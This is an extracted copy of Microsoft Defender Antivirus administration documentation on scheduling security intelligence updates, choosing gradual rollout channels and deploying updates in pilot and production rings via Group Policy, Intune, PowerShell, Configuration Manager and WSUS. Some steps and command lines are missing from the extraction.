protection updates. See the Schedule scans topic for more information.
Use Configuration Manager to schedule

protection updates
1. On your Microsoft Configuration Manager console, open the antimalware policy
you want to change (click Assets and Compliance in the navigation pane on the
left, then expand the tree to Overview > Endpoint Protection > Antimalware
Policies)
2. Go to the Security intelligence updates section.
3. To check and download updates at a certain time:
Set Check for Endpoint Protection security intelligence updates at a specific

interval... to 0.
Set Check for Endpoint Protection security intelligence updates daily at... to
the time when updates should be checked.
4. To check and download updates on a continual interval, Set Check for Endpoint
Protection security intelligence updates at a specific interval... to the number of
hours that should occur between updates.
5. Deploy the updated policy as usual.
Use Group Policy to schedule protection

updates
） Important
By default, "SignatureScheduleDay" is set as "8" and "SignatureUpdateInterval" is

set as "0" so Microsoft Defender Antivirus will not schedule protection updates.
Enabling these settings will override that default.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
Security Intelligence Updates and configure the following settings:
a. Double-click the Specify the day of the week to check for security intelligence
updates setting and set the option to Enabled. Enter the day of the week to
check for updates. Click OK.
b. Double-click the Specify the interval to check for security intelligence updates
setting and set the option to Enabled. Enter the number of hours between
updates. Click OK.
c. Double-click the Specify the time to check for security intelligence updates
setting and set the option to Enabled. Enter the time when updates should be
checked. The time is based on the local time of the endpoint. Click OK.
Use PowerShell cmdlets to schedule protection

updates
PowerShell
Set-MpPreference -SignatureScheduleDay
Set-MpPreference -SignatureScheduleTime
Set-MpPreference -SignatureUpdateInterval

to schedule protection updates
WMI
SignatureScheduleDay
SignatureScheduleTime
SignatureUpdateInterval
See the following for more information and allowed parameters:
 Tip
Related articles
Manage updates for mobile devices and virtual machines (VMs)
Microsoft Defender Antivirus in Windows 10 and 11
 Tip
Feedback

Manage the gradual rollout process for
Microsoft Defender updates
Article • 02/26/2024
Applies to:

Platforms
Windows
It's important to ensure that client components are up to date to deliver critical
protection capabilities and prevent attacks.
Capabilities are provided through several components:
Endpoint Detection & Response

Next-generation protection with cloud-delivered protection
Updates are released monthly using a gradual release process. This process helps to
enable early failure detection to identify issues as they occur and address them quickly
before a larger rollout.
７ Note
For more information on how to control daily security intelligence updates, see
Schedule Microsoft Defender Antivirus protection updates. Updates ensure that
next-generation protection can defend against new threats, even if cloud-delivered
protection is not available to the endpoint.
Microsoft gradual rollout model

The following gradual rollout model is followed for monthly Defender updates:
1. The first release goes out to Beta channel subscribers.

2. After validation, feedback, and fixes, we start the gradual rollout process in a
throttled way and to Preview channel subscribers first.
3. We then proceed to release the update to the rest of the global population, scaling
out from 10-100%.
Our engineers continuously monitor impact and escalate any issues to create a fix as
needed.
How to customize your internal deployment

process
If your machines are receiving Defender updates from Windows Update, the gradual
rollout process can result in some of your devices receiving Defender updates sooner
than others. The following section explains how to define a strategy that will allow
automatic updates to flow differently to specific groups of devices by using update
channel configuration.
７ Note
When planning for your own gradual release, please make sure to always have a
selection of devices subscribed to the preview and staged channels. This will
provide your organization as well as Microsoft the opportunity to prevent or find
and fix issues specific to your environment.
For machines receiving updates through, for example, Windows Server Update Services
(WSUS) or Microsoft Configuration Manager, more options are available to all Windows
updates, including options for Microsoft Defender for Endpoint.
Learn more about how to use solutions such as WSUS and MECM to manage the
distribution and application of updates at Manage Microsoft Defender Antivirus
updates and apply baselines - Windows security.
Update channels for monthly updates

You can assign a machine to an update channel to define the cadence in which a
machine receives monthly engine and platform updates.
For more information on how to configure updates, see Create a custom gradual rollout
process for Microsoft Defender updates.
The following update channels are available:
ﾉ Expand table
Channel Description Application

name
Beta Test updates Devices set to this channel are the first to receive new monthly
Channel - before others updates. Select Beta Channel to participate in identifying and
Prerelease reporting issues to Microsoft. Devices in the Windows Insider
Program are subscribed to this channel by default. For use in
test environments only.
Current Get Current Devices set to this channel are offered updates earliest during
Channel Channel updates the gradual release cycle. Suggested for pre-
(Preview) earlier during production/validation environments.
gradual release
Current Get Current Devices are offered updates later during the gradual release
Channel Channel updates cycle. Suggested to apply to a small, representative part of
(Staged) later during your device population (~10%).
gradual release
Current Get updates at Devices will be offered updates only after the gradual release
Channel the end of cycle completes. Suggested to apply to a broad set of devices
(Broad) gradual release in your production population (~10-100%).
Critical: Delay Defender Devices are offered updates with a 48-hour delay. Best for
Time Delay updates datacenter machines that only receive limited updates.
Suggested for critical environments only.
(default) If you disable or don't configure this policy, the device remains
in Current Channel (Default): Stay up to date automatically
during the gradual release cycle. This means Microsoft assigns
a channel to the device. The channel selected by Microsoft
might be one that receives updates early during the gradual
release cycle, which isn't suitable for devices in a production or
critical environment.
Update channels for security intelligence updates

You can also assign a machine to a channel to define the cadence in which it receives
SIUs (formerly referred to as signature, definition, or daily updates). Unlike the monthly
process, there's no Beta channel and this gradual release cycle occurs multiple times a
day.
ﾉ Expand table
Channel Description Application
name
Current Get Current Devices are offered updates later during the gradual release
Channel Channel updates cycle. Suggested to apply to a small, representative part of your
(Staged) later during device population (~10%).
gradual release
Current Get updates at Devices will be offered updates after the gradual release cycle.
Channel the end of Best for datacenter machines that only receive limited updates.
(Broad) gradual release Note: this setting applies to all Defender updates.
(default) If you disable or don't configure this policy, the device remains
in Current Channel (Default): Stay up to date automatically
during the gradual release cycle. This means Microsoft assigns a
channel to the device. The channel selected by Microsoft might
be one that receives updates early during the gradual release
cycle, which isn't suitable for devices in a production or critical
environment.
７ Note
In case you wish to force an update to the newest signature instead of leveraging
the time delay, you will need to remove this policy first.
Update guidance
In most cases, the recommended configuration when using Windows Update is to allow
endpoints to receive and apply monthly Defender updates as they arrive. This option
provides the best balance between protection and possible impact associated with the
changes they can introduce.
For environments where there's a need for a more controlled gradual rollout of
automatic Defender updates, consider an approach with deployment groups:
1. Participate in the Windows Insider program or assign a group of devices to the

Beta Channel.
2. Designate a pilot group that opts-in to Preview Channel, typically validation

environments, to receive new updates early.
3. Designate a group of machines that receive updates later during the gradual
rollout from Staged channel. Typically, this group would be a representative ~10%
of the population.
4. Designate a group of machines that receive updates after the gradual release cycle
completes. These are typically important production systems.
For the remainder of devices, the default setting is to receive new updates as they arrive
during the Microsoft gradual rollout process and no further configuration is required.
Adopting this model:
Allows you to test early releases before they reach a production environment
Ensure the production environment still receives regular updates and ensure
protection against critical threats.
Management tools
To create your own custom gradual rollout process for monthly updates, you can use
the following tools:
Group policy
Microsoft Intune
PowerShell
For details on how to use these tools, see Create a custom gradual rollout process for
Microsoft Defender updates.
 Tip

 Tip
Feedback

Create a custom gradual rollout process
for Microsoft Defender updates
Article • 02/16/2024
Applies to:

Platforms
Windows
７ Note
This functionality requires Microsoft Defender Antivirus version 4.18.2106.X or

newer.
To create your own custom gradual rollout process for Defender updates, you can use
Group Policy, Intune, and PowerShell.
The following table lists the available group policy settings for configuring update
channels:
ﾉ Expand table
Setting title Description Location
Select gradual Enable this policy to specify when devices Windows

Microsoft receive Microsoft Defender platform updates Components\Microsoft
Defender during the monthly gradual rollout. Defender Antivirus
monthly platform Beta Channel: Devices set to this channel are
update rollout the first to receive new updates. Select Beta
channel Channel to participate in identifying and
reporting issues to Microsoft. Devices in the
Windows Insider Program are subscribed to this
channel by default. For use in (manual) test
environments only and a limited number of
devices.
Current Channel (Preview): Devices set to this

channel are offered updates earliest during the
monthly gradual release cycle. Suggested for

pre-production/validation environments.
Current Channel (Staged): Devices are offered

updates after the monthly gradual release cycle.
Suggested to apply to a small, representative
part of your production population (~10%).
Current Channel (Broad): Devices are offered

updates only after the gradual release cycle
completes. Suggested to apply to a broad set of
devices in your production population (~10-
100%).
Critical- Time Delay: Devices are offered

updates with a 48-hour delay. Suggested for
critical environments only.
If you disable or don't configure this policy, the

device stays up to date automatically during the
gradual release cycle. Suitable for most devices.

Microsoft receive Microsoft Defender engine updates Components\Microsoft
Defender during the monthly gradual rollout. Defender Antivirus
monthly engine Beta Channel: Devices set to this channel are
update rollout the first to receive new updates. Select Beta
channel Channel to participate in identifying and
reporting issues to Microsoft. Devices in the
Windows Insider Program are subscribed to this
channel by default. For use in (manual) test
environments only and a limited number of
devices.
Current Channel (Preview): Devices set to this

channel are offered updates earliest during the
monthly gradual release cycle. Suggested for
pre-production/validation environments.
Current Channel (Staged): Devices are offered

updates after the monthly gradual release cycle.
Suggested to apply to a small, representative
part of your production population (~10%).

100%).
Critical- Time Delay: Devices are offered

updates with a 48-hour delay. Suggested for
critical environments only.

gradual release cycle. Suitable for most devices.

Microsoft receive Microsoft Defender security intelligence Components\Microsoft
Defender daily updates during the daily gradual rollout. Defender Antivirus
security Current Channel (Staged): Devices are offered
intelligence updates after the release cycle. Suggested to
updates rollout apply to a small, representative part of
channel production population (~10%).

100%).

daily release cycle. Suitable for most devices.
Disable gradual Enable this policy to disable gradual rollout of Windows

rollout of Defender updates. Components\Microsoft
Microsoft Current Channel (Broad): Devices set to this Defender
Defender updates channel are offered updates last during the Antivirus\MpEngine
gradual release cycle. Best for datacenter
machines that only receive limited updates.
Note: This setting applies to both monthly and

daily Defender updates and overrides any
previously configured channel selections for
platform and engine updates.

device remains in Current Channel (Default)
unless specified otherwise in specific channels
for platform and engine updates. Stay up to
date automatically during the gradual release
cycle. Suitable for most devices.
Group Policy
７ Note
An updated Defender ADMX template are published together with the 21H2
release of Windows 10. A non-localized version is available for download at
defender-updatecontrols on GitHub.
You can use Group Policy to configure and manage Microsoft Defender Antivirus on
your endpoints.
In general, you can use the following procedure to configure or change Microsoft
Defender Antivirus group policy settings:
Console, right-click the Group Policy Object (GPO) you want to configure and
select Edit.
2. Using the Group Policy Management Editor go to Computer configuration.
5. Expand the section (referred to as Location in the table in this article) that contains
the setting you want to configure, double-click the setting to open it, and make
configuration changes.
6. Deploy the updated GPO as you normally do .
Intune
Follow the instructions in below link to create a custom policy in Intune:
Add custom settings for Windows 10 devices in Microsoft Intune.
For more information on the Defender CSP used for the gradual rollout process, see
Defender CSP.
PowerShell
Use the Set-MpPreference cmdlet to configure roll out of the gradual updates.
Use the following parameters:

PowerShell
Set-MpPreference
-PlatformUpdatesChannel Beta|Preview|Staged|Broad|Delayed|NotConfigured
-EngineUpdatesChannel Beta|Preview|Staged|Broad|Delayed|NotConfigured
-DisableGradualRelease 1|0
-DefinitionUpdatesChannel Staged|Broad|NotConfigured
Example:
Use Set-MpPreference -PlatformUpdatesChannel Beta to configure platform updates to

arrive from the Beta Channel.
For more information on the parameters and how to configure them, see Set-
MpPreference (Microsoft Defender Antivirus).
７ Note
You can also use a management tool such as Microsoft Configuration Manager to
run PowerShell scripts. See Create and run PowerShell scripts from the
Configuration Manager console for guidance on this topic.
 Tip

 Tip
Feedback

Deploy Microsoft Defender Antivirus in
rings
Article • 12/01/2023
Applies to:

Platforms
Windows
Windows Server

 Tip
Deploying Microsoft Defender for Endpoint can be done using a ring-based deployment
approach and updating using the gradual rollout process.
Ring deployment overview

It's important to ensure that client components are up to date to deliver critical
protection capabilities and prevent attacks. Capabilities are provided through several
components:
Endpoint Detection & Response

Next-generation protection with cloud-delivered protection
Updates are released monthly using a gradual release process. This process helps to
enable early failure detection to identify problematic results in your unique environment
as it occurs and address it quickly before a larger rollout.
７ Note
For more information on how to control daily security intelligence updates, see
Schedule Microsoft Defender Antivirus protection updates. Updates ensure that
next-generation protection can defend against new threats, even if cloud-delivered
protection is not available to the endpoint.
This article provides overview information about deploying Microsoft Defender Antivirus
in rings for a gradual rollout process.
Management tools
To create your own custom gradual rollout process for daily and/or monthly updates,
you can use the following methods that use the tools:
Microsoft Intune and Microsoft Update microsoft-intune-and-microsoft-update -

Requires direct access to the internet. Microsoft Update (MU), formerly known as
Windows Update (WU)
System Center Configuration Manager and Windows Server Update Services -
System Center Configuration Manager (SCCM) Software Update Point (SUP) =
SCCM + Windows Server Update Services (WSUS)
Group Policy and Microsoft Update - Requires direct access to the internet
Group Policy and network share - For example, UNC path, SMB, CIFS
Group Policy and WSUS
For details on how to use these tools, see Create a custom gradual rollout process for
Microsoft Defender updates.
Customers that prioritize availability over security, should take a crawl, walk, run
approach.
Deployment scenarios
Ring deployment using Intune and Microsoft Update
Ring deployment using System Center Configuration Manager and Windows
Server Update Services (WSUS)
Ring deployment using Group Policy and Microsoft Update
Ring deployment using Group Policy and network share
Ring deployment using Group Policy and Windows Server Update Services
Pilot ring deployment using Group Policy and Windows Server Update Services
Production ring deployment using Group Policy and Windows Server Update
Services
Feedback

Microsoft Defender Antivirus ring
deployment using Intune and direct
internet access for Microsoft Update
Article • 12/01/2023
Applies to:

Platforms
Windows
Windows Server

 Tip
Setting up the pilot environment

This section describes the process for setting up the pilot UAT / Test / QA environment.

On about 10-500* Windows and/or Windows Server systems, depending on how many
total systems that you all have:
In the Intune portal https://endpoint.microsoft.com , create or append to your

Microsoft Defender Antivirus policy the following setting: For example, your pilot policy
named MDAV_Settings_Pilot. If you have a Citrix environment, include at least one Citrix
VM (non-persistent and/or persistent).
７ Note
Security intelligence update (SIU) is equivalent to signature updates, which is the

same as definition updates.
Recommended settings are as follows:
ﾉ Expand table
Feature Recommendation
Engine Updates Channel Beta Channel
Platform Updates Channel Beta Channel
Security Intelligence Updates Channel Current Channel (Staged)
References
Antivirus profiles - Devices managed by Microsoft Intune
Use Endpoint security Antivirus policy to manage Microsoft Defender update
behavior
Manage the gradual rollout process for Microsoft Defender updates
Setting up the Production environment

In the Intune portal https://endpoint.microsoft.com , create or append to your
Microsoft Defender Antivirus policy using the following setting: For example, your
production policy named MDAV_Settings_Production.
ﾉ Expand table
Feature Recommendation Comments
Engine Updates Critical – Time delay It's delayed by two days.

Channel
Platform Updates Critical – Time delay It's delayed by two days.

Channel
Security Current Channel This configuration provides you with 3 hours of time
Intelligence (Broad) to find an FP and prevent the production systems
Updates Channel from getting an incompatible signature update.
If you encounter problems
If you encounter problems with your deployment, change the source of the Microsoft
Defender Antivirus updates:
1. In the Intune portal https://endpoint.microsoft.com , go to Endpoint Security,

select Antivirus, and then find your Intune production policy (for example,
MDAV_Settings_Production), and then, in Configuration settings, select Edit.
2. Change the entry to FileShares. This change is shown in the following figure.
What this change does

It forces Microsoft Defender Antivirus to look for the Security Intelligence Update,
Engine Update or Platform Update from a file share that doesn't exist.
How long does it take for the Intune policy to refresh?

If you update a policy, it's within a few minutes (3-5 minutes) via WNS, as long the WNS
URLs' are open.
Reference: Intune actions that immediately send a notification to a device
After the issue is resolved, set the "Signature Update Fallback Order" back to the original
setting"
InternalDefinitionUpdateServder|MicrosoftUpdateServer|MMPC|FileShare
See also
Microsoft Defender Antivirus ring deployment
Feedback

Microsoft Defender Antivirus ring
deployment using System Center
Configuration Manager and Windows
Server Update Services
Article • 08/02/2023
Applies to:

Platforms
Windows
Windows Server

 Tip


７ Note

On about 10-500 Windows and/or Windows Server systems, depending on how many
total systems that you all have.
７ Note
If you have a Citrix environment, include at least 1 Citrix VM (non-persistent) and/or

(persistent)
1. In System Center Configuration Manager > Create Automatic Deployment Rule

Wizard > General page, in Specify the setting for this automatic deployment
rule, make the following settings:
ﾉ Expand table
In: Change:
Name Type a name for your deployment rule. For example, type MDE-
MDAV_Security_Intelligence_Update_Pilot
Description Type a brief description for your pilot
Template Select SCEP and Windows Defender Antivirus Updates
Collection Type Windows_Security_Intelligence_Pilot

In: Change:
Each time the rule runs Select Create a new Software Update Group
and finds new updates.
Each time the rule runs Select Enable the deployment after this rule is run
and finds new updates
2. Select Next. On the Deployment Settings page, under Specify the settings for this
Automatic Deployment Rule, then do the following:
ﾉ Expand table
In: Change:
Type of deployment Select Required
Detail level Select Only error messages
Some software updates Select Automatically deploy all software updates found
include a license agreement by this rule, and approve any license agreements.
3. Select Next. On the Software Updates page, under Select the property filters and
search criteria, make the following settings:
ﾉ Expand table
In: Change:
Property filters Select Article ID and Date Released or Revised
Search Criteria Enter the following

Article ID = 2267602
Date Released or Revised = Last 1 month
Product = Windows Defender
Superseded = No
Update Classification = "Critical Updates" OR "Definition Updates"
These settings are shown in the following image:


 Tip
Click Preview - to make sure "Security Intelligence Update for Windows

Defender Antivirus" is listed. You should see KB2267602.
７ Note
Date Released or Revised: Last 1 month - If your WSUS/SUP have been

healthy, you may want to set this to "Last 1 week".
Product: "Windows Defender" - We are removing "System Center Endpoint

Protection", because we want to target this to only the operating systems that
have Microsoft Defender Antivirus.
Update Classification: "Critical Updates" and "Definition Updates"
4. Select Next. On the Evaluation Schedule page, under Specify the recurring
schedule for this rule, select Run the rule on a schedule, and then select
Customize.
5. On the Deployment Schedule page, under Configure schedule details for this
deployment, do the following:
ﾉ Expand table
In: Change:
Schedule evaluation > Time based on Select UTC
Software available time Select As soon as possible
Installation deadline Select As soon as possible
6. Select Next. On the User Experience page, under Specify the user experience for
this deployment, ensure the following are selected:
ﾉ Expand table
In: Change:
User visual experience > User Select Hide in Software center and all notifications
notifications
Deadline behavior Select Software Update Installation
Device restart behavior Select Servers
Write filter handling for Windows Select Commit changes at deadline or during a
Embedded devices maintenance windows (requires restarts)
7. Select Next. On the Alerts page, under Specify software update alert options for
this deployment, select Generate an alert when this Rule fails, and then select
Next.
8. On the top-level Deployment Package page, under Select deployment package

for this automatic deployment rule, select Create a new deployment package,
and then do the following:
ﾉ Expand table
In: Change:
Name Type a name for your new deployment package. For

example, type MDE-MDAV Security Intelligence Update.
Description Type a brief description for your new deployment package

In: Change:
Package Source (Example): Type the path to your package source. For example, type
\server_name_folder path_ \sccm\deployment\MDE-
MDAV_Security_Intelligence_Updates_Pilot
or select Browse to navigate to - and select - your package
source.
Sending priority: Select High and select Enable binary differential replication
9. Select Next. On the Distribution point page, under Specify the distribution points
or distribution point groups to host the content, select Add and then specify your
distribution point or distribution point groups.
10. Select Next. On the Distribution location page, under Specify download location
for this Automatic Deployment Rule, select Download software updates from the
Internet, and then select Next.
11. On the Distribution location page, under Specify the update languages for
product, under product, select Windows Update.
12. Select Next. On the Download Settings page, under Specify the software updates
download behavior for clients on slow site boundaries, select the following:
ﾉ Expand table
In: Change:
Name In Deployment options select Download software updates from

distribution point and install
Deployment Select Download and install software updates from the distribution
options points in site default boundary group
Deployment Select "Prefer cloud based sources over on-premises sources" is

options configures in the boundary group settings, Microsoft update will be
the preferred source.
13. Select Next. On the Summary page, under Confirm the settings, review the
settings. Example settings are shown in the following figure.

14. Select Next. Wait until the process completes and the Completion page opens.
Select Close to finish the process. Automatic Deployment rules are saved, and can
be managed from the location shown in the following figure:
Setting up the production environment

1. In the System Center Configuration Manager > Create Automatic Deployment
Rule Wizard > General page, in Specify the setting for this automatic
deployment rule, make the following settings:
ﾉ Expand table
In: Change:
Name Type a name for your deployment rule. For example, type MDE-
MDAV_Security_Intelligence_Update_Production
Description Type a brief description for your pilot
Template Select SCEP and Windows Defender Antivirus Updates
Collection Type Windows_Security_Intelligence_Production
Each time the rule Select Add to an existing Software Update Group
runs and finds new
updates.
Each time the rule Select Enable the deployment after this rule is run
runs and finds new
updates
2. Select Next. On the Deployment Settings page, under Specify the settings for this
Automatic Deployment Rule, then do the following:
ﾉ Expand table
In: Change:
Type of deployment Select Required
Detail level Select Only error messages
Some software updates Select Automatically deploy all software updates found
include a license agreement by this rule, and approve any license agreements.
3. Select Next. On the Software Updates page, under Select the property filters and
search criteria, enter the following:
ﾉ Expand table
In: Change:
Property filters Select Product and Update Classification

In: Change:
Search Criteria Enter the following product and update classifications:

Article ID = 2267602
Date Released or Revised = Last 1 month
Product = Windows Defender
Superseded = No
Update Classification = Critical Updates OR Definition Updates
 Tip
Click Preview - to make sure "Security Intelligence Update for Windows

Defender Antivirus" is listed. You should see KB2267602.
７ Note
Date Released or Revised: Last 1 month - If your WSUS/SUP have been

healthy, you may want to set this to Last 1 week.
Product: "Windows Defender" - We are removing "System Center Endpoint

Protection", because we want to target this to only the operating systems that
have Microsoft Defender Antivirus.
Update Classification: "Critical Updates" and "Definition Updates"
4. Select Next. On the Evaluation Schedule page, under Specify the recurring
schedule for this rule, select Run the rule on a schedule, and then select
Customize.
5. On the Deployment Schedule page, under **Configure schedule details for this
deployment, do the following:
ﾉ Expand table
In: Change:
Schedule evaluation > Time based on Select UTC
Software available time Select As soon as possible
Installation deadline Select As soon as possible
6. Select Next. On the User Experience page, under Specify the user experience for
this deployment, ensure the following are selected:
ﾉ Expand table
In: Change:
User visual experience > User Select Hide in Software center and all notifications
notifications
Deadline behavior Select Software Update Installation
Device restart behavior Select Servers
Write filter handling for Windows Select Commit changes at deadline or during a
Embedded devices maintenance windows (requires restarts)
7. Select Next. On the Alerts page, under Specify software update alert options for
this deployment, select Generate an alert when this Rule fails, select Browse,
navigate to, and select the deployment package and then select Next.
8. On the top-level Deployment Package page, under Select deployment package

for this automatic deployment rule, select Select a deployment package.
9. On the Download Location page, under Specify download location for this
Automatic Deployment Rule, select Download software updates from the
Internet, and then select Next.
10. On the Language Selection page, under Specify the update languages for
product, under Product, specify the necessary Product and Update languages.
11. Select Next. On the Download Settings page, under Specify the software updates
download behavior for clients on slow site boundaries, select the following:
ﾉ Expand table
In: Change:
options points and install
options points site default boundary group
Deployment Select "Prefer cloud based sources over on-premises sources" is

options configures in the boundary group settings, Microsoft update will be
the preferred source.
12. Select Next. On the Summary page, under Confirm the settings, review the
settings. Example settings are shown in the following figure:

13. Select Next. Wait until the process completes and the Completion page opens.
Select Close to finish the process.

1. Navigate to Software Library
2. Under Software Updates, select on Automatic Deployment Rules, right-click on

MDE-MDAV_Security_Intelligence_Update_Production, and then select Disable.
This setting is shown in the following figure:

See also
Microsoft Defender for Endpoint ring deployment
Feedback

production ring deployment using
Group Policy and Microsoft Updates
Article • 08/02/2023
Applies to:

Platforms
Windows
Windows Server

 Tip
Prerequisites
Review the read me article at Readme https://github.com/microsoft/defender-
updatecontrols/blob/main/README.md
Download the latest Windows Defender .admx and .adml
WindowsDefender.admx
WindowsDefender.adml
Copy the latest .admx and .adml to the Domain Controller Central Store.
Setting up the Pilot (UAT/Test/QA)
environment
７ Note

On about 10-500 Windows and/or Windows Server systems, depending on how many
total systems that you all have, perform the following tasks.
７ Note

(persistent)
In Group Policy Management Console (GPMC, GPMC.msc), create or append to your

Microsoft Defender Antivirus policy.
1. Edit your Microsoft Defender Antivirus policy. For example, edit

MDAV_Settings_Pilot. Go to Computer Configuration > Policies > Administrative
Templates > Windows Components > Microsoft Defender Antivirus. There are
three related options:
ﾉ Expand table
Feature Recommendation for the pilot
systems
Select the channel for Microsoft Defender daily Current Channel (Staged)
Security Intelligence updates
Select the channel for Microsoft Defender monthly Beta Channel

Engine updates

Platform updates
The three options are shown in the following figure.
For more information, see Manage the gradual rollout process for Microsoft
Defender updates
2. Go to Computer Configuration > Policies > Administrative Templates > Windows

3. For intelligence updates, double-click Select the channel for Microsoft Defender
monthly intelligence updates.

4. On the Select the channel for Microsoft Defender monthly intelligence updates
page, select Enabled, and in Options, select Current Channel (Staged).

7. For engine updates, double-click Select the channel for Microsoft Defender
monthly engine updates.
8. On the Select the channel for Microsoft Defender monthly Platform updates
page, select Enabled, and in Options, select Beta Channel.
10. For platform updates, double-click Select the channel for Microsoft Defender
monthly Platform updates.
page, select Enabled, and in Options, select Beta Channel. These two settings are
shown in the following figure:
Related articles
behavior (Preview)

1. In Group Policy Management Console (GPMC, GPMC.msc), go to Computer
Configuration > Policies > Administrative Templates > Windows Components >
2. Set the three policies as follows:
ﾉ Expand table
Feature Recommendation for Remarks

the production
systems
Select the channel for Current Channel (Broad) This setting provides you with 3 hours
Microsoft Defender of time to find an FP and prevent the
daily Security production systems from getting an
Intelligence updates incompatible signature update.
the production
systems
Select the channel for Critical – Time delay Updates are delayed by two days.
Microsoft Defender
monthly Engine
updates
Microsoft Defender
monthly Platform
updates
page, select Enabled, and in Options, select Current Channel (Broad).

page, select Enabled, and in Options, select Critical – Time delay.

If you encounter problems with your deployment, create or append your Microsoft
Defender Antivirus policy:
1. In Group Policy Management Console (GPMC, GPMC.msc), create or append to

your Microsoft Defender Antivirus policy using the following setting:
Go to Computer Configuration > Policies > Administrative Templates > Windows

Components > Microsoft Defender Antivirus > (administrator-defined)
PolicySettingName. For example, MDAV_Settings_Production, right-click, and then
select Edit. Edit for MDAV_Settings_Production is shown in the following figure:
2. Select Define the order of sources for downloading security intelligence updates.
3. Select the radio button named Enabled.
4. Under Options:, change the entry to FileShares, select Apply, and then select OK.
This change is shown in the following figure:

6. Select the radio button named Disabled, select Apply, and then select OK. The
disabled option is shown in the following figure:

7. The change is active when Group Policy updates. There are two methods to refresh
Group Policy:
From the command line, run the Group Policy update command. For
example, run gpupdate / force . For more information, see gpupdate
Wait for Group Policy to automatically refresh. Group Policy refreshes every
90 minutes +/- 30 minutes.
If you have multiple forests/domains, force replication or wait 10-15 minutes. Then
force a Group Policy Update from the Group Policy Management Console.
Right-click on an organizational unit (OU) that contains the machines (for

example, Desktops), select Group Policy Update. This UI command is the
equivalent of doing a gpupdate.exe /force on every machine in that OU. The
feature to force Group Policy to refresh is shown in the following figure:

8. After the issue is resolved, set the Signature Update Fallback Order back to the
original setting.
InternalDefinitionUpdateServder|MicrosoftUpdateServer|MMPC|FileShare .
See also
behavior (Preview)
Microsoft Defender Antivirus ring deployment overview
Feedback
Group Policy and network share
Article • 08/02/2023
Applies to:

Platforms
Windows
Windows Server

 Tip
Introduction
This article describes how to deploy Microsoft Defender Antivirus in rings using Group
Policy and Network share (also known as UNC path, SMB, CIFS).
Prerequisites
Review the read me article at Readme
1. Download the latest Windows Defender .admx and .adml.
WindowsDefender.admx
WindowsDefender.adml
2. Copy the latest .admx and .adml to the Domain Controller Central Store.
3. Create a UNC share for security intelligence and platform updates

７ Note

Create a UNC share for security intelligence and platform

updates
Set up a network file share (UNC/mapped drive) to download security intelligence and
platform updates from the MMPC site by using a scheduled task.
1. On the system on which you want to provision the share and download the
updates, create a folder to which you will save the script.
Console
MD C:\Tool\PS-Scripts\
2. Create the folder to which you will save the signature updates.
Console
3. Set up a PowerShell script, CopySignatures.ps1
Copy-Item -Path "\SourceServer\Sourcefolder" -Destination

"\TargetServer\Targetfolder"
4. Use the command line to set up the scheduled task.
７ Note
There are two types of updates: full and delta.
For x64 delta:
PowerShell
C:\Tool\PS-Scripts\

1"
For x64 full:
PowerShell
C:\Tool\PS-Scripts\

1"
For x86 delta:
PowerShell
C:\Tool\PS-Scripts\

1"
For x86 full:
PowerShell
C:\Tool\PS-Scripts\

1"
７ Note
When the scheduled tasks are created, you can find these in the Task
Scheduler under Microsoft\Windows\Windows Defender .
5. Run each task manually and verify that you have data ( mpam-d.exe , mpam-fe.exe ,
and nis_full.exe ) in the following folders (you might have chosen different
locations):
If the scheduled task fails, run the following commands:
Console
７ Note
Issues could also be due to execution policy.
6. Create a share pointing to C:\Temp\TempSigs (e.g., \\server\updates ).
７ Note
At a minimum, authenticated users must have "Read" access. This requirement

also applies to domain computers, the share, and NTFS (security).
7. Set the share location in the policy to the share.
７ Note
Do not add the x64 (or x86) folder in the path. The mpcmdrun.exe process
adds it automatically.
Setting up the Pilot (UAT/Test/QA)

environment
This section describes the process for setting up the pilot UAT / Test / QA environment,
on about 10-500 Windows and/or Windows Server systems, depending on how many
７ Note

(persistent)
In Group Policy Management Console (GPMC, GPMC.msc), create or append to your

Microsoft Defender Antivirus policy.
1. Edit your Microsoft Defender Antivirus policy. For example, edit

MDAV_Settings_Pilot. Go to Computer Configuration > Policies > Administrative
Templates > Windows Components > Microsoft Defender Antivirus. There are
three related options:
ﾉ Expand table
Feature Recommendation for the pilot

systems
Select the channel for Microsoft Defender daily Current Channel (Staged)
Security Intelligence updates

Engine updates

Platform updates
The three options are shown in the following figure.


For more information, see Manage the gradual rollout process for Microsoft
Defender updates


page, select Enabled, and in Options, select Current Channel (Staged).

page, select Enabled, and in Options, select Beta Channel.
page, select Enabled, and in Options, select Beta Channel. These two settings are
shown in the following figure:
Related articles
behavior (Preview)

1. In Group Policy Management Console (GPMC, GPMC.msc), go to Computer
Configuration > Policies > Administrative Templates > Windows Components >
2. Set the three policies as follows:
ﾉ Expand table

the production
systems
Select the channel for Current Channel (Broad) This setting provides you with 3 hours
Microsoft Defender of time to find an FP and prevent the
daily Security production systems from getting an
Intelligence updates incompatible signature update.
the production
systems
Microsoft Defender
monthly Engine
updates
Microsoft Defender
monthly Platform
updates
page, select Enabled, and in Options, select Current Channel (Broad).




4. Under Options:, change the entry to FileShares, select Apply, and then select OK.


Group Policy:


original setting.
InternalDefinitionUpdateServder|MicrosoftUpdateServer|MMPC|FileShare .
See also
Microsoft Defender Antivirus ring deployment overview
Feedback

Microsoft Defender Antivirus pilot ring
deployment using Group Policy and
Article • 08/02/2023
Applies to:

Platforms
Windows
Windows Server

 Tip
Resources
The following resources provide information for using and managing Windows Server
Update Services (WSUS).
Deploy Windows Defender definition updates using WSUS - Configuration

Manager
Windows Server Update Services Help

This section provides information about setting up the pilot (UAT/Test/QA) environment
using Group Policy and Windows Server Update Services (WSUS).
７ Note

７ Note
If you have a Citrix environment, include at least one Citrix VM (non-persistent)

and/or (persistent)
1. Launch the Windows Server Update Services Configuration Wizard.
2. On the Before You Begin page, review the preliminary information and attend to
any configuration or credential matters, and then select Next.
3. On the Microsoft Update Improvement Program page, if you would like to

participate in the program, select Yes, I would like to join the Microsoft Update
Improvement Program. Select Next.
4. On the Choose Upstream Server page, select Synchronize from Microsoft Update
and then select Next.
5. On the Specify Proxy Server page, select Next.

6. On the Choose Languages page, select Download updates only in these
languages. Select the update languages that you want to download, and then
select Next
7. On the Choose Products page, scroll down to Forefront, select Forefront Client
Security and System Center Endpoint Protection This is shown in the following
figure.
While still on the Choose Products page, scroll down to Windows and select
8. Select Next. On the Choose Classification page, select: critical Updates, Definition
Updates, and Security Updates, and then select Next.
9. On the Configure Sync Schedule page, do the following:
ﾉ Expand table
In: Change:
Synchronize automatically select (enable)
First synchronization Set time to 5:00:00 AM
Synchronizations per day Set to 1

10. Select Next. On the Finished page, select Next.
11. On the What's next page, select Finish.
